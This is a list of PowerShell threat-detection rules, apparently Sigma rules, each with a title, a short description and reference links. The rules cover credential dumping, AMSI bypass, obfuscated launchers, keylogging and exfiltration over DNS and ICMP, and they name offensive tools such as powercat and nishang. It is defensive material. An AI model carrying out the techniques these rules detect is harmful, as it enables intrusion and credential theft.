Clear PowerShell History - PowerShell Module Detects keywords that could indicate clearing PowerShell history https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a
PowerShell Decompress Commands A general detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. https://github.com/OTRF/detection-hackathon-apt29/issues/8, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md
Malicious PowerShell Scripts - PoshModule Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat
Suspicious Get-ADDBAccount Usage Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md
PowerShell Get Clipboard A general detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md
HackTool - Evil-WinRm Execution - PowerShell Module Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility. https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb, https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code
Invoke-Obfuscation CLIP+ Launcher - PowerShell Module Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - PowerShell Module Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - PowerShell Module Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - PowerShell Module Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - PowerShell Module Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - PowerShell Module Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - PowerShell Module Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Malicious PowerShell Commandlets - PoshModule Detects Commandlet names from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module Detects PowerShell module creation where the module contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary, which is known to be vulnerable to module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
AD Groups Or Users Enumeration Using PowerShell - PoshModule Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Remote PowerShell Session (PS Module) Detects remote PowerShell sessions https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Suspicious PowerShell Download - PoshModule Detects suspicious PowerShell download command https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0
Use Get-NetTCPConnection - PowerShell Module Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell
Suspicious PowerShell Invocations - Generic - PowerShell Module Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious PowerShell Invocations - Specific - PowerShell Module Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious Get Local Groups Information Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Suspicious Computer Machine Password by PowerShell The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Suspicious Get Information for SMB Share - PowerShell Module Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Zip A Folder With PowerShell For Staging In Temp - PowerShell Module Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
SyncAppvPublishingServer Bypass Powershell Restriction - PS Module Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions. https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
AADInternals PowerShell Cmdlets Execution - PsScript Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 which can be abused by threat actors to attack Azure AD or Office 365. https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals
Access to Browser Login Data Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
Potential Active Directory Enumeration Using AD Module - PsScript Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration. https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges
Add Windows Capability Via PowerShell Script Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content
Powershell Add Name Resolution Policy Table Rule Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for the specified namespace. This bypasses the default DNS server and uses a specified server for answering the query. https://twitter.com/NathanMcNulty/status/1569497348841287681, https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps
PowerShell ADRecon Execution Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1, https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319
AMSI Bypass Pattern Assembly GetType Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/, https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA
Potential AMSI Bypass Script Using NULL Bits Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi
Silence.EDA Detection Detects Silence EmpireDNSAgent as described in the Group-IB report https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf
Get-ADUser Enumeration Using UserAccountControl Flags Detects Get-ADUser enumeration of accounts via their UserAccountControl flags, a precursor to AS-REP roasting. AS-REP roasting is an often-overlooked attack; it is not very common, as accounts must be explicitly configured to not require pre-authentication. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting, https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/
Potential Data Exfiltration Via Audio File Detects potential exfiltration attempt via audio file using PowerShell https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1
Automated Collection Command PowerShell Once established within a system or network, an adversary may use automated techniques for collecting internal data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
Windows Screen Capture with CopyFromScreen Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen
Clearing Windows Console History Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/, https://www.shellhacks.com/clear-history-powershell/, https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics
Clear PowerShell History - PowerShell Detects keywords that could indicate clearing PowerShell history https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
Powershell Create Scheduled Task Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task
Powershell Install a DLL in System Directory Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64" https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll
Registry-Free Process Scope COR_PROFILER Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler
PowerShell Create Local User Detects creation of a local user via PowerShell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md
Create Volume Shadow Copy with Powershell Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information https://attack.mitre.org/datasources/DS0005/, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7
Powershell Detect Virtualization Environment Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md, https://techgenix.com/malicious-powershell-scripts-evade-detection/
DirectorySearcher Powershell Exploitation Enumerates Active Directory to determine computers that are joined to the domain https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher
Manipulation of User Computer or Group Security Principals Across AD Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell, https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0
Disable Powershell Command History Detects scripts or commands that disable the PowerShell command history by removing the PSReadline module https://twitter.com/DissectMalware/status/1062879286749773824
Disable-WindowsOptionalFeature Command PowerShell Detects usage of the built-in PowerShell cmdlet "Disable-WindowsOptionalFeature", a Deployment Image Servicing and Management (DISM) tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
Potential In-Memory Execution Using Reflection.Assembly Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50
Potential COM Objects Download Cradles Usage - PS Script Detects usage of COM objects that can be abused to download files in PowerShell by CLSID https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57
DSInternals Suspicious PowerShell Cmdlets - ScriptBlock Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
Dump Credentials from Windows Credential Manager With PowerShell Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md
Enable Windows Remote Management Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2
Potential Suspicious Windows Feature Enabled Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server
Enumerate Credentials from Windows Credential Manager With PowerShell Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md
Disable of ETW Trace - Powershell Detects usage of powershell cmdlets to disable or remove ETW trace sessions https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
Suspicious PowerShell Mailbox SMTP Forward Rule Detects usage of the PowerShell Set-Mailbox cmdlet to set up an SMTP forwarding rule. https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Certificate Exported Via PowerShell - ScriptBlock Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
Suspicious FromBase64String Usage On Gzip Archive - Ps Script Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
Service Registry Permissions Weakness Check Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4
Active Directory Computers Enumeration With Get-AdComputer Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory. https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md
Active Directory Group Enumeration With Get-AdGroup Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Suspicious Get-ADReplAccount The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. https://www.powershellgallery.com/packages/DSInternals, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount
Automated Collection Bookmarks Using Get-ChildItem PowerShell Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md
Security Software Discovery Via Powershell Script Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell
HackTool - Rubeus Execution - ScriptBlock Detects the execution of the hacktool Rubeus using specific command line flags https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus
HackTool - WinPwn Execution - ScriptBlock Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation. https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team
PowerShell Hotfix Enumeration Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1
PowerShell ICMP Exfiltration Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp
Import PowerShell Modules From Suspicious Directories Detects powershell scripts that import modules from suspicious directories https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript Detects usage of the "Add-AppxPackage" cmdlet or its alias "Add-AppPackage" to install unsigned AppX packages https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122
Execute Invoke-command on Remote Host Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4
Powershell DNSExfiltration DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh, https://github.com/Arno0x/DNSExfiltrator
Invoke-Obfuscation CLIP+ Launcher - PowerShell Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the following code block: https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - Powershell Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - PowerShell Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - Powershell Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - Powershell Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - PowerShell Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - PowerShell Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Powershell Keylogging Adversaries may log user keystrokes to intercept credentials as the user types them. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1
